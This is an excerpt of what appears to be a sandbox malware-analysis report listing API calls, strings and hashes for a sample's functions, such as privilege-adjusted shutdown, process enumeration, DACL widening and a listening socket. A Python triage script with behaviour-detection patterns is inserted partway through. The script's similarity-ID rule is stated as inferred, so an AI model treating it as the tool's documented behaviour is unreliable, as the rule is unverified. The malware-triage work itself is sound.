                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2192556992-3457252023
                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                • __swprintf.LIBCMT ref: 004722B9
                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FolderPath$LocalTime__swprintf
                                                • String ID: %.3d
                                                • API String ID: 3337348382-986655627
                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                • GetLastError.KERNEL32 ref: 00433414
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2938487562-3733053543
                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                APIs
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 1255039815-0
                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                APIs
                                                • __swprintf.LIBCMT ref: 00433073
                                                • __swprintf.LIBCMT ref: 00433085
                                                • __wcsicoll.LIBCMT ref: 00433092
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                • LockResource.KERNEL32(?), ref: 00433120
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                • String ID:
                                                • API String ID: 1158019794-0
                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_strncmp
                                                • String ID: @oH$\$^$h
                                                • API String ID: 2175499884-3701065813
                                                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                • String ID:
                                                • API String ID: 540024437-0
                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
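Added example, not code from this report or from the Joe Sandbox IDA plugin: a Python script that parses the "APIs" listings printed above (the shutdown routine at 004333CE, the directory walk at 004428A8 and the listening socket at 0046530D are embedded as constructed copies), rebuilds the Similarity "API ID" label from the call names, and raises the behaviour tags a triage analyst would want from each function. The API ID rule it implements (CamelCase tokens, tokens of three characters or fewer dropped, frequency groups joined by "$") is an inference from the IDs printed on this page and is not taken from Joe Sandbox; the PATTERNS table and the tag names are this example's own assumptions.

```python
"""Parse Joe Sandbox "APIs" listings, rebuild the Similarity "API ID", tag behaviours.

Added example, not code from the report or the Joe Sandbox IDA plugin. The three
listings are constructed copies of listings on this page; the API ID rule is
inferred from the IDs printed beside them (an assumption, not Joe Sandbox's code).
"""
import re
from collections import Counter, defaultdict

# One "• Name.MODULE(args), ref: ADDR" line; subcall lines carry a caller prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# CamelCase splitter that keeps acronym runs (WSA, SH), digit suffixes
# (Process32) and C-runtime names (__wsplitpath_helper, closesocket) whole.
TOKEN = re.compile(r"[A-Z]+(?=[A-Z][a-z])|[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")

SHUTDOWN_LISTING = """\
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
"""
DIRWALK_LISTING = """\
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
"""
SOCKET_LISTING = """\
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• WSAGetLastError.WSOCK32(00000000), ref: 0046531C
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
• WSAGetLastError.WSOCK32(00000000), ref: 00465363
• closesocket.WSOCK32(00000000,00000000), ref: 00465377
• listen.WSOCK32(00000000,00000005), ref: 00465381
• WSAGetLastError.WSOCK32(00000000), ref: 004653A9
• closesocket.WSOCK32(00000000,00000000), ref: 004653BD
"""


def parse_api_lines(text):
    """Return the calls of one listing, in order, as dicts; subcall lines keep their caller."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            call = m.groupdict()
            call["args"] = [a for a in (call["args"] or "").split(",") if a]
            calls.append(call)
    return calls


def api_id(names):
    """Inferred rule: tokenise each name, drop tokens of three chars or fewer
    (Get, Set, W, Ex, WSA, Sid ...), count them, then emit frequency groups from
    most to least common, tokens in a group sorted by code point, '$' between groups."""
    counts = Counter(t for n in names for t in TOKEN.findall(n) if len(t) > 3)
    by_freq = defaultdict(list)
    for tok, n in counts.items():
        by_freq[n].append(tok)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


# Triage tags (this example's own assumption): a tag fires when every call in the
# first set and at least one call in the second set appear in the listing.
PATTERNS = {
    "privilege-adjust+shutdown": ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
                                  {"ExitWindowsEx", "InitiateSystemShutdownExW", "SetSystemPowerState"}),
    "desktop-dacl-widening": ({"AddAce", "SetSecurityDescriptorDacl"}, {"SetUserObjectSecurity"}),
    "process-enumeration": ({"CreateToolhelp32Snapshot"}, {"Process32FirstW", "Process32NextW"}),
    "listening-socket": ({"socket", "bind"}, {"listen"}),
}


def tag_behaviours(calls):
    names = {c["name"] for c in calls}
    return sorted(tag for tag, (required, any_of) in PATTERNS.items()
                  if required <= names and names & any_of)


if __name__ == "__main__":
    for label, text in (("shutdown", SHUTDOWN_LISTING), ("dirwalk", DIRWALK_LISTING),
                        ("socket", SOCKET_LISTING)):
        calls = parse_api_lines(text)
        print(label, len(calls), api_id(c["name"] for c in calls), tag_behaviours(calls))
```

Recomputing the API ID from a listing is a useful integrity check before reusing a report's IDs for similarity lookups: if the recomputed value differs from the printed one, the listing was truncated or a "Part of subcall function" line was dropped during extraction, since those subcall lines count towards the ID exactly like direct calls.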
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                • API String ID: 0-2872873767
                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                • __wsplitpath.LIBCMT ref: 00475644
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscat.LIBCMT ref: 00475657
                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                • String ID:
                                                • API String ID: 2547909840-0
                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
